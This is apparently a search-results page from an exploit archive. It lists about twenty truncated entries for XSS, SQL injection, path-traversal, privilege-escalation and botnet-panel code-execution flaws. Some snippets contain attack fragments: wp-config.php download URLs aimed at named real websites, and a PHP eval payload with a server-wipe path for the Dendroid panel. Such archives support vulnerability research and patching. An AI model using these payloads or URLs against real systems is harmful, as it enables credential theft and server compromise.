93 matches found
docsify 4.11.6 Cross Site Scripting Vulnerability
docsify versions 4.11.6 and below suffer from a cross site scripting vulnerability. This vulnerability exists due to an incomplete fix for CVE-2020-7680. docsify = 4.11.6 DOM-based Cross-Site Scripting Vulnerability...
Airties AIR5453 1.0.0.18 Cross Site Scripting Vulnerability
A cross site scripting vulnerability has been discovered in the AIR5453 modem of the AirTies manufacturer. AirTies Air 5453 devices have XSS via the top.html productboardtype parameter. Exploit Title: Airties AIR5453 - Cross-site Scripting Exploit Author: Ismail Tasdelen Vendor Homepage:...
Cobub Razor 0.8.0 - Physical path Leakage Vulnerability
Exploit for php platform in category web applications Exploit Title: Cobub Razor 0.8.0 Physical path Leakage Vulnerability Exploit Author: Kyhvedn Vendor Homepage: http://www.cobub.com/ Software Link: https://github.com/cobub/razor Version: 0.8.0 CVE : CVE-2018-8770 PoC: URL:...
UCOPIA Wireless Appliance Privilege Escalation Vulnerability
Exploit for linux platform in category local exploits CVE-2017-11322 UCOPIA Wireless Appliance 5.1.8 Privileges Escalation Asset description UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers. More than 12,000 UCOPIA solutions...
FLIR Systems FLIR Thermal Camera F/FC/PT/D Hard-Coded SSH Credentials Vulnerability
Exploit for hardware platform in category remote exploits FLIR Systems FLIR Thermal Camera F/FC/PT/D Hard-Coded SSH Credentials Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA,...
Wetransfer Clone Script - Authentication Bypass Vulnerability
Exploit for php platform in category web applications Vulnerability: SQL Injection + Authentication Bypass Date: 18.01.2017 Vendor Homepage: http://www.scriptgiant.com/ Script Name: Wetransfer Clone Script Script Buy Now: http://www.popularclones.com/products/File-Transfer-Script Author: Ihsan...
PHP 5.6.26 and 7.0.11 Use After Free in unserialize() Vulnerability
Exploit for php platform in category remote exploits PoC: References: https://bugs.php.net/bug.php?id=73147 0day.today 2018-04-08...
Dendroid botnet Remote Code Execution Vulnerability
Bonus to remotely wipe the whole server: /deletepics.php?uid=../../Panel/ import requests Add URL Set a PHP payload Go to http://website/config.php URL = 'http://localhost/Panel/applysettings.php' PAYLOAD = "isset$GET'tapz' ? eval$GET'tapz' : '" data = 'dbhost' : 'localhost', 'dbname' : 'dendroid...
iBanking botnet Shell Upload Vulnerability
Exploit for php platform in category web applications FiLEZ: 0day.today 2018-03-28...
phpSound Music Sharing Platform Multiple XSS Vulnerabilities
Usage Info phpSound is a Social Music Sharing Platform similar with SoundCloud, that allows users to upload their music online and share them with the world. ===Stored XSS=== Create a Playlist and then you can run any XSS payload on "Title" or "Description" input fields. Sample Payload for Stored...
Serenity Client Management Portal Multiple Vulnerabilities
Serenity is a light-weight, PHP-based online client management application that is built for freelancers. Focused on the intimate relationship between freelancers and their clients, Serenity makes heavy use of the jQuery library and AJAX protocols to do powerful things with little effort and to...
Mouse Media Script Stored XSS Vulnerability
Exploit for php platform in category web applications Login to system and upload any of your image. When uploading the image you need to enter the XSS Payload to "Title" and "Description" inputs. And then you can visit home page to check the uploaded payload. All these uploaded image and payload...
WordPress Markant Theme Arbitrary File Download Vulnerability
Exploit for php platform in category web applications Poc: http://localhost/wp-content/themes/markant/download.php?file=../../wp-config.php Demo: http://www.markant.org/wp-content/themes/markant/download.php?file=../../wp-config.php Greetz to : All Egy-Shel...
WordPress SMWF Theme Arbitrary File Download Vulnerability
Exploit for php platform in category web applications POC : http://localhost/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php Demo : http://jaarverslag.smwf.nl/2013/wp-content/themes/SMWF/inc/download.php?file=2013/wp-config.php Greetz to : All...
Disqus 2.7.5 Cross Site Request Forgery / Cross Site Scripting
Exploit for php platform in category web applications disqus csrf reset -- -- alert1;' / 0day.today 2018-03-09...
Sendy 1.1.8.4 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Sendy SqlInject Date: 2014-02-24 Exploit Author: Hurley Vendor Homepage: http://sendy.co/ Software Link: http://sendy.co/ Version: 1.1.8.4 Demo page:...
FileStealer v1.3 Upload Vulnerability
Exploit for php platform in category web applications File: HWID: Hash: PC: 0day.today 2018-03-12...
Solaris 10 Patch Cluster File Clobber
Solaris 10 patch cluster suffers from a file clobber vulnerability in /tmp. File clobbering vulnerability in Solaris 10 patch cluster 3/27/2013 Larry W. Cashdollar @larry0 Hello, The 147147-26 patch creates a CLEANUP file in /tmp that is vulnerable to symlink attacks: The contents of the file...
MyBB ChangUonDyu Extra File Chatbox Persistent XSS Vulnerability
Popular inferno-like chatbox built for MyBB! ChangUonDyu Extra File Chatbox Persistent XSS Location: Chatbox Notice Vendor: http://community.mybb.com/thread-63559.html PoC: function buildnotice global $fcbfile,$smilies; $noticef = filegetcontents$fcbfile'notice'; $handle =...
Wordpress Wp-TopBar 4.02 CSRF/XSS Vulnerabilities
Exploit for php platform in category web applications Exploit Title: WP-TopBar 4.02 CSRF Date: 2012-09-13 Author: Blake Entrekin Version: 4.02 Download Link: http://downloads.wordpress.org/plugin/wp-topbar.4.02.zip Vendor Link: http://wordpress.org/extend/plugins/wp-topbar/ CS...